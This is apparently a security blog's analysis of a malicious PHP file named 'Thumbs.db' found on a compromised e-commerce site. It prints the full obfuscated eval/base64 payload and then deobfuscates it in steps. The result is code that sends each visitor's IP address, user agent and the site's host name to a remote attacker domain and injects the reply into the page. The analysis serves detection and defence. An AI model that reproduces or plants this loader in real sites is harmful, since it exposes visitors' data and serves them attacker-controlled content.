Summary

Thumbs.db can contain malicious code meant to get content from a remote server and pass it to your site’s visitors.  Files named “Thumbs.db” may only be image thumbnail files generated by Windows.  But if your site has any files named “Thumbs.db” matching the description below, then it has almost certainly been compromised.

Background

We found a cleverly hidden malicious PHP file named “Thumbs.db” left in a site running CRE Loaded v6.2 Pro[12].  There are reports of other malicious files named “Thumbs.db.php”, but this one leaves off the PHP extension and relies on a line injected into the .htaccess file to get handled by the PHP interpreter.  This makes it blend in better as an innocuous file, as Windows automatically generates “Thumbs.db” files to store little preview icons for images, and these often get uploaded to websites along with the images.

If Thumbs.db is included or executed, it grabs content from a remote host and serves it back to the user.

Analysis

Here is the original code. The @ symbol makes it so that errors are handled silently.

@eval(base64_decode("aWYgKCRldmFsWmpoR1lUZm9GSWV0R28gIT0gMzQ1MTcpIHtmdW5jdGlvbiBldmFsSkhJT2tnekluU01KSCgkcyl7Zm9yICgkYSA9IDA7ICRhIDw9IHN0cmxlbigkcyktMTsgJGErKyApeyRlIC49ICRze3N0cmxlbigkcyktJGEtMX07fXJldHVybigkZSk7fWV2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1BU2Y3a0NhWWxFZTROR1pqRjBheUZGYmhaWFprZ1NaazkyWWxSMlgwWVRaekZtWWc0bWMxUlhaeXRISXBnR1dKaEhlalIyWUJ0bWNSeFdZMlZHSm9ZRVdKRkdWWmRXZVF0RWJoWlhaZzQyYnBSM1l1Vm5aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09wSVNQTkpUV2lnaVJZbFVZVWwxWjVCMVNzRm1kbEJTUGdZVlE1OWtabVpVV3RkSFVpeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI3a2lJOTBFU2tobVV6TW1Jb1lFV0pGR1ZaZFdlUXRFYmhaWFo5czJRUjFVY3FGRlVobGxZSHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZRVdKRkdWWmRXZVF0RWJoWlhaOU1rWms1VWJCRkZWbVpGVm1aM1E2eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLaTBETlhGbUlvWUVXSkZHVlpkV2VRdEViaFpYWjk4RWVuTlZiT3AxVVM5R1NMSmxid3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T3BJU1A5RVZTMlIyVkpKQ0tHaFZTaFJWV25sSFVMeFdZMlZXUDZkMFlrMVVaejFXYURsbFFpMUdhcnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T2RsaUlWVlRWU2hrUndnMVVXQlRWV2xqUlZWbFVHTmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpiSlZSV0pWUlQ5Rko5VTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpnd1NLaVFqVkhwVmRHZDFWaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElTUEpobFd5dzJSaHBtU1lsbFpHZFZZaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElDTTUwV1VQNWtWVUpDS0doVlNoUlZXbmxIVUx4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9ZRVdKRkdWWmRXZVF0RWJoWlhaZ3dTS2l3R2V5b2xkNUlqVWlnaVJZbFVZVWwxWjVCMVNzRm1kbGhTZWhKbmNoQlNQZzBVYTBaV1RLUkVlcGhIY3E1MlNTeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9PXdPV0ZVZVBabVpHbFZiM0JsWXNGbWRsUlNQdUFuYUNwVVY1UkdXc05HYmhaWFprQVNLZ3N5S3BSQ0k3Z0RJOXdESXBSQ0k3QURJOUFTYWtnQ0l5OW1aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1zVEtwSVNQOUVsWjNzV2VqdDJaNU5HTTFjbFd3VWpNaXBXT0dSR2JrSkRXc2gzVmgxbVFGbFVkS2hGWndZVmJqZGpRVHRrZVNOMFNObHphYWRuU3NWR05vVjBWQ1pGYmtkblZISkdhYWhsV25Sak1pQm5VemtWZFc1bVdpZ2lSWWxVWVVsMVo1QjFTc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09XRlVlUFptWkdsVmIzQmxZc0ZtZGxSaUxpNGlJOTRDSXdwbVFLVlZla2hGYmp4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj0wWGY3TUdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQXlib05XWjcwVk1iTkdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQVNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa0F5T3BNR1dGcG1iWHBXWmpSbVdPbEViaFpYWmt3aWVITkdaTlYyY3RsMlFaSmtZdGgyYXNGbWRsUkNLbFIyYnNCSGVsQlNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa3NYS3BvM1JqUldUbE5YYnBOVVdDSldib3RHYmhaWFprd3lZWVZrYXVkbGFsTkdaYTVVU3NGbWRsUkNLeVIzY3lSM2NvQWlacHRUS3AwVktpVWxUeFFWUzVZVVZWSmxSVEpDS0doVlNoUlZXbmxIVUx4V1kyVjJXU1ZrVlNWMFVmUkNLbFIyYmo1V1pzSlhkdWtpSTVjV2JLSkNLR2hWU2hSVldubEhVTHhXWTJWbUxwVTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0pvVUdadk5tYmx4bWMxNVNLaWtUU3Rwa0lvWUVXSkZHVlpkV2VRdEViaFpYWnUwVktpMFRTR0pWUkdCRFdHSlZNVTVrVnJWbElvWUVXSkZHVlpkV2VRdEViaFpYWmJKVlJXSlZSVDlGSnVraUk5QURWaEpDS0doVlNoUlZXbmxIVUx4V1kyVm1McElTUDRRMFlpZ2lSWWxVWVVsMVo1QjFTc0ZtZGw1U0tpOG1RdXhrSW9ZRVdKRkdWWmRXZVF0RWJoWlhadThFZW5OVmJPcDFVUzlHU0xKbGJ3eFdZMlZHSnVraUk5MHpkTUpDS0doVlNoUlZXbmxIVUx4V1kyVm1Md3BtUUtWVmVraEZianhXWTJWR0p1a2lJOWdUZU1KQ0tHaFZTaFJWV25sSFVMeFdZMlZtTHBJU1A5YzJUaWdpUllsVVlVbDFaNUIxU3NGbWRsNXlRbVJtVHRGVVVVWm1WVVptZERwSGJoWlhaa2dDVFBaR2NTcEhlSWhWUVZaSGNseFdZMlZHSTlBeVlZVmthdWRsYWxOR1phNVVTc0ZtZGxSQ0k3a0NNd2dETXhzU0tvVVdicFJITHBraUk5MEVTa2htVXpNbUlvWUVXSkZHVlpkV2VRdEViaFpYWm9VRFp0eHlhREZWVHhwV1VRRldXaWRFYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hyTlVVTkZuYVJCVllaSjJSc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLVjkwYUx0MmFpbDJjaEpIU3NGbWRsUkNJc0lTYXZJQ0l1QVNLTmxHZG0xa1NFaFhhNEJuYXV0a1VzRm1kbFJDSXNJQ2ZpZ1NaazlHYncxV2FnNENJaThpSW9nMlkwRldiZmRXWnlCSEtvWVdhIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7JGV2YWxaamhHWVRmb0ZJZXRHbyA9MzQ1MTc7fQ=="));

After base64-decoding, you can see “eval” and “base64_decode” written backwards in those the result, as well as a function evalJHIOkgzInSMJH() which simply reverses the string that it receives as input. I’m going to rename it “reverse()” and sort out line breaks and such.

if ($evalZjhGYTfoFIetGo != 34517) {
   function reverse($s) {
       for ($a = 0; $a            $e .= $s{strlen($s)-$a-1};
       }
       return($e);
   }
   eval(reverse(';))"=sTKwgyZulGdy9GclJ3Xy9mcyVGQ"(edoced_46esab(lave'));
   eval(reverse(';))"=ASf7kCaYlEe4NGZjF0ayFFbhZXZkgSZk92YlR2X0YTZzFmYg4mc1RXZytHIpgGWJhHejR2YBtmcRxWY2VGJoYEWJFGVZdWeQtEbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOpISPNJTWigiRYlUYUl1Z5B1SsFmdlBSPgYVQ59kZmZUWtdHUixWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"7kiI90ESkhmUzMmIoYEWJFGVZdWeQtEbhZXZ9s2QR1UcqFFUhllYHxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"7kiI90TQjBjUIFmIoYEWJFGVZdWeQtEbhZXZ9MkZk5UbBFFVmZFVmZ3Q6xWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKi0DNXFmIoYEWJFGVZdWeQtEbhZXZ98EenNVbOp1US9GSLJlbwxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOpISP9EVS2R2VJJCKGhVShRVWnlHULxWY2VWP6d0Yk1UZz1WaDllQi1GarxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOdliIVVTVShkRwg1UWBTVWljRVVlUGNlIoYEWJFGVZdWeQtEbhZXZbJVRWJVRT9FJ9U1Trt0arJWazFmcIxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKpISP9c2YshXbZRnRtVlIoYEWJFGVZdWeQtEbhZXZgwSKiQjVHpVdGd1VigiRYlUYUl1Z5B1SsFmdlBCLpISPJhlWyw2RhpmSYllZGdVYigiRYlUYUl1Z5B1SsFmdlBCLpICM50WUP5kVUJCKGhVShRVWnlHULxWY2VGIskiI9EkbjFDeyUlIoYEWJFGVZdWeQtEbhZXZgwSKiwGeyold5IjUigiRYlUYUl1Z5B1SsFmdlhSehJnchBSPg0Ua0ZWTKREephHcq52SSxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOWFUePZmZGlVb3BlYsFmdlRSPuAnaCpUV5RGWsNGbhZXZkASKgsyKpRCI7gDI9wDIpRCI7ADI9ASakgCIy9mZ"(edoced_46esab(lave'));
   eval(reverse(';))"=sTKpISP9ElZ3sWejt2Z5NGM1clWwUjMipWOGRGbkJDWsh3Vh1mQFlUdKhFZwYVbjdjQTtkeSN0SNlzaadnSsVGNoV0VCZFbkdnVHJGaahlWnRjMiBnUzkVdW5mWigiRYlUYUl1Z5B1SsFmdlhCbhZXZ"(edoced_46esab(lave'));
   eval(reverse(';))"==wOWFUePZmZGlVb3BlYsFmdlRiLi4iI94CIwpmQKVVekhFbjxWY2VGJ"(edoced_46esab(lave'));
   eval(reverse(';))"=0Xf7MGWFpmbXpWZjRmWOlEbhZXZkAyboNWZ70VMbNGWFpmbXpWZjRmWOlEbhZXZkASPgMGWFpmbXpWZjRmWOlEbhZXZkAyOpMGWFpmbXpWZjRmWOlEbhZXZkwieHNGZNV2ctl2QZJkYth2asFmdlRCKlR2bsBHelBSPgMGWFpmbXpWZjRmWOlEbhZXZksXKpo3RjRWTlNXbpNUWCJWbotGbhZXZkwyYYVkaudlalNGZa5USsFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGhVShRVWnlHULxWY2V2WSVkVSV0UfRCKlR2bj5WZsJXdukiI5cWbKJCKGhVShRVWnlHULxWY2VmLpU1Trt0arJWazFmcIxWY2VGJoUGZvNmblxmc15SKikTStpkIoYEWJFGVZdWeQtEbhZXZu0VKi0TSGJVRGBDWGJVMU5kVrVlIoYEWJFGVZdWeQtEbhZXZbJVRWJVRT9FJukiI9ADVhJCKGhVShRVWnlHULxWY2VmLpISP4Q0YigiRYlUYUl1Z5B1SsFmdl5SKi8mQuxkIoYEWJFGVZdWeQtEbhZXZu8EenNVbOp1US9GSLJlbwxWY2VGJukiI90zdMJCKGhVShRVWnlHULxWY2VmLwpmQKVVekhFbjxWY2VGJukiI9gTeMJCKGhVShRVWnlHULxWY2VmLpISP9c2TigiRYlUYUl1Z5B1SsFmdl5yQmRmTtFUUUZmVUZmdDpHbhZXZkgCTPZGcSpHeIhVQVZHclxWY2VGI9AyYYVkaudlalNGZa5USsFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoYEWJFGVZdWeQtEbhZXZoUDZtxyaDFVTxpWUQFWWidEbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXrNUUNFnaRBVYZJ2RsFmdlRyWFl0SP90QfRCK0V2czlGKgI3bgkSKV90aLt2ail2chJHSsFmdlRCIsISavICIuASKNlGdm1kSEhXa4BnautkUsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));
   $evalZjhGYTfoFIetGo = 34517;
}

With all the strings reversed, here’s what we get:

if ($evalZjhGYTfoFIetGo != 34517) {
   eval(base64_decode("QGVycm9yX3JlcG9ydGluZygwKTs="));
   eval(base64_decode("ZnVuY3Rpb24gZXZhbEtQeWdZVGFJWEYoJGV2YWxRcmtBY2RjeHhJWGgpIHtyZXR1cm4gYmFzZTY0X2RlY29kZSgkZXZhbFFya0FjZGN4eElYaCk7fSA="));
   eval(base64_decode("JGV2YWxiUHdtWUZmZk95QVYgPSBldmFsS1B5Z1lUYUlYRigiWTJNPSIpOw=="));
   eval(base64_decode("JGV2YWxHYllhUFFqcU1RQ2s9ZXZhbEtQeWdZVGFJWEYoImMzUmhkSE09Iik7"));
   eval(base64_decode("JGV2YWx6Q3ZmVFZmVFFBbU5kZkM9ZXZhbEtQeWdZVGFJWEYoImFIUjBjQT09Iik7"));
   eval(base64_decode("JGV2YWxwblJLSG9SU1pObVNneE89ZXZhbEtQeWdZVGFJWEYoImFXND0iKTs="));
   eval(base64_decode("JGV2YWxraG1iQllDaW1zZU1kY0d6PWV2YWxLUHlnWVRhSVhGKCJJV2R2SVE9PSIpOw=="));
   eval(base64_decode("JGV2YWxSS25qcHhpeERKTWZ0aU0gPSBhcnJheShldmFsS1B5Z1lUYUlYRigiUjI5dloyeGwiKSwgZXZhbEtQeWdZVGFJWEYoIlUyeDFjbkE9IiksIGV2YWxLUHlnWVRhSVhGKCJUVk5PUW05MCIpLCBldmFsS1B5Z1lUYUlYRigiYVdGZllYSmphR2wyWlhJPSIpLCBldmFsS1B5Z1lUYUlYRigiV1dGdVpHVjQiKSwgZXZhbEtQeWdZVGFJWEYoIlVtRnRZbXhsY2c9PSIpKTs="));
   eval(base64_decode("JGV2YWxIcmFzaWJra0trT1U9JF9TRVJWRVJbZXZhbEtQeWdZVGFJWEYoIlNGUlVVRjlWVTBWU1gwRkhSVTVVIildOw=="));
   eval(base64_decode("Zm9yICgkaSA9IDA7ICRpIDw9IDg7ICRpKysgKSAkZXZhbGNsWGR5VUpCanAuPSRldmFsYlB3bVlGZmZPeUFWOw=="));
   eval(base64_decode("ZXZhbChldmFsS1B5Z1lUYUlYRigiWm5WdVkzUnBiMjRnWlhaaGJHVndkbFZCV0VoNGVsSndaazlNS0NSektTQjdjbVYwZFhKdUlFQm1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z2tjeWs3ZlE9PSIpKTs="));
   eval(base64_decode("JGV2YWxjbFhkeVVKQmpwIC49Ii4iLiRldmFsYlB3bVlGZmZPeUFWOw=="));
   eval(base64_decode("aWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRldmFsUktuanB4aXhESk1mdGlNKSAuICIvaSIsICRldmFsSHJhc2lia2tLa09VKSkgb3IgKGlzc2V0KCRfQ09PS0lFWyRldmFsR2JZYVBRanFNUUNrXSkpKSB7fSBlbHNlIHsgQHNldGNvb2tpZSgkZXZhbEdiWWFQUWpxTVFDayxtZDUoZXZhbEtQeWdZVGFJWEYoImMzUmhkSE09IikpLHRpbWUoKSsxMDgwMCk7ICRldmFsSU5aZGNlalduakVYYyA9IGV2YWxlcHZVQVhIeHpScGZPTCgkZXZhbHpDdmZUVmZUUUFtTmRmQy5ldmFsS1B5Z1lUYUlYRigiT2c9PSIpLmV2YWxLUHlnWVRhSVhGKCJMeTg9IikuJGV2YWxjbFhkeVVKQmpwLmV2YWxLUHlnWVRhSVhGKCJMdz09IikuJGV2YWxwblJLSG9SU1pObVNneE8uZXZhbEtQeWdZVGFJWEYoIkxuQm8iKS5ldmFsS1B5Z1lUYUlYRigiY0Q4PSIpLmV2YWxLUHlnWVRhSVhGKCJhVDA9IikuJF9TRVJWRVJbZXZhbEtQeWdZVGFJWEYoIlVrVk5UMVJGWDBGRVJGST0iKV0uZXZhbEtQeWdZVGFJWEYoIkptSTkiKS51cmxlbmNvZGUoJGV2YWxIcmFzaWJra0trT1UpLmV2YWxLUHlnWVRhSVhGKCJKbWc5IikudXJsZW5jb2RlKCRfU0VSVkVSW2V2YWxLUHlnWVRhSVhGKCJTRlJVVUY5SVQxTlUiKV0pKTtpZiAoc3Ryc3RyKCRldmFsSU5aZGNlalduakVYYywkZXZhbGtobWJCWUNpbXNlTWRjR3opKXskZXZhbElOWmRjZWpXbmpFWGMgPSBleHBsb2RlKCRldmFsa2htYkJZQ2ltc2VNZGNHeiwkZXZhbElOWmRjZWpXbmpFWGMpOyAkZXZhbElOWmRjZWpXbmpFWGMgPSAkZXZhbElOWmRjZWpXbmpFWGNbMV07ZWNobyAkZXZhbElOWmRjZWpXbmpFWGM7fX0="));
   $evalZjhGYTfoFIetGo = 34517;
}

After base64 decoding all those strings and removing the eval() on each one:

if ($evalZjhGYTfoFIetGo != 34517) {
   @error_reporting(0);
   function evalKPygYTaIXF($evalQrkAcdcxxIXh) {return base64_decode($evalQrkAcdcxxIXh);}
   $evalbPwmYFffOyAV = evalKPygYTaIXF("Y2M=");
   $evalGbYaPQjqMQCk=evalKPygYTaIXF("c3RhdHM=");
   $evalzCvfTVfTQAmNdfC=evalKPygYTaIXF("aHR0cA==");
   $evalpnRKHoRSZNmSgxO=evalKPygYTaIXF("aW4=");
   $evalkhmbBYCimseMdcGz=evalKPygYTaIXF("IWdvIQ==");
   $evalRKnjpxixDJMftiM = array(evalKPygYTaIXF("R29vZ2xl"), evalKPygYTaIXF("U2x1cnA="), evalKPygYTaIXF("TVNOQm90"), evalKPygYTaIXF("aWFfYXJjaGl2ZXI="), evalKPygYTaIXF("WWFuZGV4"), evalKPygYTaIXF("UmFtYmxlcg=="));
   $evalHrasibkkKkOU=$_SERVER[evalKPygYTaIXF("SFRUUF9VU0VSX0FHRU5U")];
   for ($i = 0; $i    eval(evalKPygYTaIXF("ZnVuY3Rpb24gZXZhbGVwdlVBWEh4elJwZk9MKCRzKSB7cmV0dXJuIEBmaWxlX2dldF9jb250ZW50cygkcyk7fQ=="));
   $evalclXdyUJBjp .=".".$evalbPwmYFffOyAV;
   if((preg_match("/" . implode("|", $evalRKnjpxixDJMftiM) . "/i", $evalHrasibkkKkOU)) or (isset($_COOKIE[$evalGbYaPQjqMQCk]))) {} else { @setcookie($evalGbYaPQjqMQCk,md5(evalKPygYTaIXF("c3RhdHM=")),time()+10800); $evalINZdcejWnjEXc = evalepvUAXHxzRpfOL($evalzCvfTVfTQAmNdfC.evalKPygYTaIXF("Og==").evalKPygYTaIXF("Ly8=").$evalclXdyUJBjp.evalKPygYTaIXF("Lw==").$evalpnRKHoRSZNmSgxO.evalKPygYTaIXF("LnBo").evalKPygYTaIXF("cD8=").evalKPygYTaIXF("aT0=").$_SERVER[evalKPygYTaIXF("UkVNT1RFX0FERFI=")].evalKPygYTaIXF("JmI9").urlencode($evalHrasibkkKkOU).evalKPygYTaIXF("Jmg9").urlencode($_SERVER[evalKPygYTaIXF("SFRUUF9IT1NU")]));if (strstr($evalINZdcejWnjEXc,$evalkhmbBYCimseMdcGz)){$evalINZdcejWnjEXc = explode($evalkhmbBYCimseMdcGz,$evalINZdcejWnjEXc); $evalINZdcejWnjEXc = $evalINZdcejWnjEXc[1];echo $evalINZdcejWnjEXc;}}
   $evalZjhGYTfoFIetGo = 34517;
}

Another layer of obfuscation. evalKPygYTaIXF() is a wrapper around base64_decode. After formatting it, removing the base64_decode wrapper, and doing all the base64 decodes:

if ($evalZjhGYTfoFIetGo != 34517) {
   @error_reporting(0);
   $evalbPwmYFffOyAV = "cc";
   $evalGbYaPQjqMQCk = "stats";
   $evalzCvfTVfTQAmNdfC = "http";
   $evalpnRKHoRSZNmSgxO = "in";
   $evalkhmbBYCimseMdcGz = "!go!";
   $evalRKnjpxixDJMftiM = array( "Google",
                                 "Slurp",
                                 "MSNBot",
                                 "ia_archiver",
                                 "Yandex",
                                 "Rambler");
   $evalHrasibkkKkOU = $_SERVER["HTTP_USER_AGENT"];
   for ($i = 0; $i        $evalclXdyUJBjp .= $evalbPwmYFffOyAV;
   function evalepvUAXHxzRpfOL($s) {
       return @file_get_contents($s);
   }
   $evalclXdyUJBjp .= "." . $evalbPwmYFffOyAV;
   if((preg_match("/" . implode("|", $evalRKnjpxixDJMftiM) . "/i", $evalHrasibkkKkOU)) or (isset($_COOKIE[$evalGbYaPQjqMQCk]))) {
   }
   else {
       @setcookie($evalGbYaPQjqMQCk, md5("stats"), time() + 10800);
       $evalINZdcejWnjEXc = evalepvUAXHxzRpfOL($evalzCvfTVfTQAmNdfC . ":" .
                                               "//" .
                                               $evalclXdyUJBjp .
                                               "/" .
                                               $evalpnRKHoRSZNmSgxO . ".ph" .
                                               "p?" .
                                               "i=" .
                                               $_SERVER["REMOTE_ADDR"] .
                                               "&b=" .
                                               urlencode($evalHrasibkkKkOU) .
                                               "&h=" .
                                               urlencode($_SERVER["HTTP_HOST"]));
       if (strstr($evalINZdcejWnjEXc, $evalkhmbBYCimseMdcGz)) {
           $evalINZdcejWnjEXc = explode($evalkhmbBYCimseMdcGz, $evalINZdcejWnjEXc);
           $evalINZdcejWnjEXc = $evalINZdcejWnjEXc[1];
           echo $evalINZdcejWnjEXc;
       }
   }
   $evalZjhGYTfoFIetGo = 34517;
}

Continuing to format the code, rename variables, and remove variables that don’t get changed. I also removed a wrapper around file_get_contents():

if ($flag != 34517) {
   @error_reporting(0);
   $bot_useragents = array( "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

   if((preg_match("/" . implode("|", $bot_useragents) . "/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
   }
   else {
       @setcookie("stats", md5("stats"), time() + 10800);
       $result = @file_get_contents("http://cccccccccccccccccc.cc/in.php?i=" . $_SERVER["REMOTE_ADDR"] .
                                               "&b=" . urlencode($_SERVER["HTTP_USER_AGENT"]) .
                                               "&h=" . urlencode($_SERVER["HTTP_HOST"]));
       if (strstr($result, "!go!")) {
           $result = explode("!go!", $result);
           $result = $result[1];
           echo $result;
       }
   }
   $flag = 34517;
}

And adding my comments to the final product:

// Not sure what's going on with this, other than it prevents the code from executing more than once.
if ($flag != 34517) {
   // Try to silence PHP's error messages.
   @error_reporting(0);
   // Create an array of substrings found in the User-Agent strings of some of the more common web-crawling bots.
   $bot_useragents = array( "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
   // Assemble a regular expression to check whether any of those substrings are in the client's User-Agent.
   // Also check for the presence of a cookie.
   if((preg_match("/" . implode("|", $bot_useragents) . "/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
       // If either check is positive, do nothing.  Otherwise...
   }
   else {
       // Set the "stats" cookie.  It will expire in one week.
       @setcookie("stats", md5("stats"), time() + 10800);
       // Go get the contents of the following URL, which includes the client's IP address, their User-Agent, and the
       // servers's own address or domain name.
       $result = @file_get_contents("http://cccccccccccccccccc.cc/in.php?i=" . $_SERVER["REMOTE_ADDR"] .
                                               "&b=" . urlencode($_SERVER["HTTP_USER_AGENT"]) .
                                               "&h=" . urlencode($_SERVER["HTTP_HOST"]));
       // If the result contains the substring "!go!"...
       if (strstr($result, "!go!")) {
           // Separate "!go!" from the rest of the result.
           $result = explode("!go!", $result);
           // Grab the part that, presumably, comes after "!go!"
           $result = $result[1];
           // Print the result to the browser.
           echo $result;
       }
   }
   // Set the flag.
   $flag = 34517;
}

That’s one of my favorite malware domains ever. According to the WHOIS information on robtex, it was created on 11 April 2011, then suspended on 3 May 2011. Since it doesn’t resolve to anything now, this particular version of Thumbs.db is rendered harmless, but future versions may point elsewhere.